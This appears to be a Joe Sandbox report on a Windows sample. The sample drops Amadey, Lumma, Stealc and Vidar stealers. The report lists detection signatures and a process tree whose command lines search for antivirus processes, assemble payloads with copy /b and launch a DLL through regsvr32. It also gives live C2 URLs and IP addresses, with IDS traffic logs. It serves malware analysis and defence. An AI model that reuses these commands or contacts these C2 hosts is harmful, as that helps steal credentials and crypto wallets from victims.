Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AApUa7VQiy.exe

Overview

General Information

Sample name:AApUa7VQiy.exe
renamed because original name is a hash value
Original sample name:e64310c17841e2f3ec344941fa3e61c8.exe
Analysis ID:1604525
MD5:e64310c17841e2f3ec344941fa3e61c8
SHA1:e787c70035dbe6a8160926928e93febe2cbbeba2
SHA256:c2fc387fa598098bea4d5b3358b01db102dcf8d18cea07cfde50d4455e609ed0
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Socks5Systemz, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • AApUa7VQiy.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\AApUa7VQiy.exe" MD5: E64310C17841E2F3EC344941FA3E61C8)
    • BEB973FPO2R62ZWABVOVP8TC.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe" MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
      • skotes.exe (PID: 2652 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
  • skotes.exe (PID: 7388 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
  • skotes.exe (PID: 572 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
    • infinity.exe (PID: 2164 cmdline: "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" MD5: 444869BDBA72AC6AD360BC18A6C5CACF)
      • infinity.tmp (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp" /SL5="$C0024,3499155,56832,C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" MD5: 61D017E2BE4B54CFDCE1328E4F14AE81)
        • flv2aviconverter24.exe (PID: 2400 cmdline: "C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe" -i MD5: B7556F3536A754DC1F7ED0CF03C9CD01)
    • ktIplF5.exe (PID: 4272 cmdline: "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe" MD5: 8202CF5E3C9C273DEB62E34476EF2FFB)
    • 179187318e.exe (PID: 664 cmdline: "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe" MD5: F2432FDB07CAC95C4481843FF0E77FD7)
      • cmd.exe (PID: 2656 cmdline: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6796 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3864 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 5916 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6660 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7500 cmdline: cmd /c md 36469 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 7552 cmdline: extrac32 /Y /E Geographic MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 7576 cmdline: findstr /V "TEAMS" Mw MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7596 cmdline: cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7612 cmdline: cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Avoiding.com (PID: 7628 cmdline: Avoiding.com L MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 7644 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • df1b740bf8.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe" MD5: 67EBBA5CD77B2452A5EF6A335CC057F9)
    • f46bdbcca4.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)
      • f46bdbcca4.tmp (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp" /SL5="$E0074,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" MD5: BCC236A3921E1388596A42B05686FF5E)
        • f46bdbcca4.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)
          • f46bdbcca4.tmp (PID: 6612 cmdline: "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT MD5: BCC236A3921E1388596A42B05686FF5E)
            • regsvr32.exe (PID: 7892 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 2316 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 6628 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 61f0c6628c.exe (PID: 8188 cmdline: "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)
      • cmd.exe (PID: 2012 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7184 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7352 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 5464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 5708 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 2260 cmdline: cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 2744 cmdline: extrac32 /Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 3764 cmdline: findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 4288 cmdline: cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 2552 cmdline: cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Macromedia.com (PID: 7520 cmdline: Macromedia.com F MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 6620 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}
{"C2 url": "https://warlikedbeliev.org/api", "Build Version": "7tx2jo--659"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          0000000F.00000003.1955909943.0000000001239000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000002.1533551948.0000000000691000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000006.00000003.1506211610.00000000051D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0000000C.00000002.2766438930.0000000002B28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                    Click to see the 25 entries
                    SourceRuleDescriptionAuthorStrings
                    7.2.skotes.exe.20000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      8.2.skotes.exe.20000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        6.2.BEB973FPO2R62ZWABVOVP8TC.exe.b00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          9.2.skotes.exe.20000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                            System Summary

                            barindex
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9673a0a47c.exe
                            Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2316, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6628, ProcessName: powershell.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9673a0a47c.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp, ParentProcessId: 6612, ParentProcessName: f46bdbcca4.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ProcessId: 7892, ProcessName: regsvr32.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe, ParentProcessId: 664, ParentProcessName: 179187318e.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ProcessId: 2656, ProcessName: cmd.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2316, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6628, ProcessName: powershell.exe

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2316, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6628, ProcessName: powershell.exe
                            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2656, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6660, ProcessName: findstr.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:12.234973+010020283713Unknown Traffic192.168.2.1153675104.21.18.116443TCP
                            2025-02-01T16:51:19.965987+010020283713Unknown Traffic192.168.2.1149707104.21.18.116443TCP
                            2025-02-01T16:51:21.181051+010020283713Unknown Traffic192.168.2.1149708104.21.18.116443TCP
                            2025-02-01T16:51:22.469135+010020283713Unknown Traffic192.168.2.1149710104.21.18.116443TCP
                            2025-02-01T16:51:23.644659+010020283713Unknown Traffic192.168.2.1149719104.21.18.116443TCP
                            2025-02-01T16:51:25.047613+010020283713Unknown Traffic192.168.2.1149727104.21.18.116443TCP
                            2025-02-01T16:51:26.815072+010020283713Unknown Traffic192.168.2.1149742104.21.18.116443TCP
                            2025-02-01T16:51:28.273940+010020283713Unknown Traffic192.168.2.1149750104.21.18.116443TCP
                            2025-02-01T16:51:30.539910+010020283713Unknown Traffic192.168.2.1149765104.21.18.116443TCP
                            2025-02-01T16:52:19.288514+010020283713Unknown Traffic192.168.2.1153469104.21.18.116443TCP
                            2025-02-01T16:52:20.657500+010020283713Unknown Traffic192.168.2.1153471104.21.18.116443TCP
                            2025-02-01T16:52:22.157478+010020283713Unknown Traffic192.168.2.1153473104.21.18.116443TCP
                            2025-02-01T16:52:23.753152+010020283713Unknown Traffic192.168.2.1153474104.21.18.116443TCP
                            2025-02-01T16:52:25.394499+010020283713Unknown Traffic192.168.2.1153476104.21.18.116443TCP
                            2025-02-01T16:52:29.558799+010020283713Unknown Traffic192.168.2.1153478104.21.18.116443TCP
                            2025-02-01T16:52:32.698793+010020283713Unknown Traffic192.168.2.1153481104.102.49.254443TCP
                            2025-02-01T16:52:33.274774+010020283713Unknown Traffic192.168.2.1153482104.21.18.116443TCP
                            2025-02-01T16:52:37.239259+010020283713Unknown Traffic192.168.2.1153485104.21.18.116443TCP
                            2025-02-01T16:53:31.472848+010020283713Unknown Traffic192.168.2.1153580172.67.139.144443TCP
                            2025-02-01T16:53:32.754479+010020283713Unknown Traffic192.168.2.1153591172.67.139.144443TCP
                            2025-02-01T16:53:35.343409+010020283713Unknown Traffic192.168.2.1153608104.21.18.116443TCP
                            2025-02-01T16:53:36.764039+010020283713Unknown Traffic192.168.2.1153622104.21.18.116443TCP
                            2025-02-01T16:53:37.190824+010020283713Unknown Traffic192.168.2.1153626172.67.139.144443TCP
                            2025-02-01T16:53:39.229553+010020283713Unknown Traffic192.168.2.1153631172.67.139.144443TCP
                            2025-02-01T16:53:40.731356+010020283713Unknown Traffic192.168.2.1153634172.67.139.144443TCP
                            2025-02-01T16:53:41.887344+010020283713Unknown Traffic192.168.2.1153638104.21.18.116443TCP
                            2025-02-01T16:53:42.240219+010020283713Unknown Traffic192.168.2.1153640172.67.139.144443TCP
                            2025-02-01T16:53:43.668321+010020283713Unknown Traffic192.168.2.1153650104.21.18.116443TCP
                            2025-02-01T16:53:45.000979+010020283713Unknown Traffic192.168.2.1153653104.21.18.116443TCP
                            2025-02-01T16:53:45.159849+010020283713Unknown Traffic192.168.2.1153656172.67.139.144443TCP
                            2025-02-01T16:53:46.359812+010020283713Unknown Traffic192.168.2.1153657104.21.18.116443TCP
                            2025-02-01T16:53:47.289857+010020283713Unknown Traffic192.168.2.1153660172.67.139.144443TCP
                            2025-02-01T16:53:48.798145+010020283713Unknown Traffic192.168.2.1153663104.21.18.116443TCP
                            2025-02-01T16:53:52.704228+010020283713Unknown Traffic192.168.2.1153666104.21.18.116443TCP
                            2025-02-01T16:53:55.749075+010020283713Unknown Traffic192.168.2.1153669104.21.18.116443TCP
                            2025-02-01T16:53:57.171675+010020283713Unknown Traffic192.168.2.1153671104.21.18.116443TCP
                            2025-02-01T16:53:58.458518+010020283713Unknown Traffic192.168.2.1153673104.21.18.116443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:08.182725+010020287653Unknown Traffic192.168.2.115346591.240.118.49443TCP
                            2025-02-01T16:53:10.630501+010020287653Unknown Traffic192.168.2.1153502176.113.115.96443TCP
                            2025-02-01T16:53:12.452212+010020287653Unknown Traffic192.168.2.1153511176.113.115.96443TCP
                            2025-02-01T16:53:17.666512+010020287653Unknown Traffic192.168.2.1153533176.113.115.96443TCP
                            2025-02-01T16:53:20.386169+010020287653Unknown Traffic192.168.2.1153538176.113.115.96443TCP
                            2025-02-01T16:53:22.167297+010020287653Unknown Traffic192.168.2.1153542176.113.115.96443TCP
                            2025-02-01T16:53:24.232064+010020287653Unknown Traffic192.168.2.1153546176.113.115.96443TCP
                            2025-02-01T16:53:25.762915+010020287653Unknown Traffic192.168.2.1153548176.113.115.96443TCP
                            2025-02-01T16:53:28.148215+010020287653Unknown Traffic192.168.2.1153550176.113.115.96443TCP
                            2025-02-01T16:53:30.122840+010020287653Unknown Traffic192.168.2.1153564176.113.115.96443TCP
                            2025-02-01T16:53:31.649208+010020287653Unknown Traffic192.168.2.1153579176.113.115.96443TCP
                            2025-02-01T16:53:33.588434+010020287653Unknown Traffic192.168.2.1153592176.113.115.96443TCP
                            2025-02-01T16:53:35.210598+010020287653Unknown Traffic192.168.2.1153597176.113.115.96443TCP
                            2025-02-01T16:53:36.845879+010020287653Unknown Traffic192.168.2.1153621176.113.115.96443TCP
                            2025-02-01T16:53:38.408661+010020287653Unknown Traffic192.168.2.1153630176.113.115.96443TCP
                            2025-02-01T16:53:40.018999+010020287653Unknown Traffic192.168.2.1153632176.113.115.96443TCP
                            2025-02-01T16:53:41.627393+010020287653Unknown Traffic192.168.2.1153635176.113.115.96443TCP
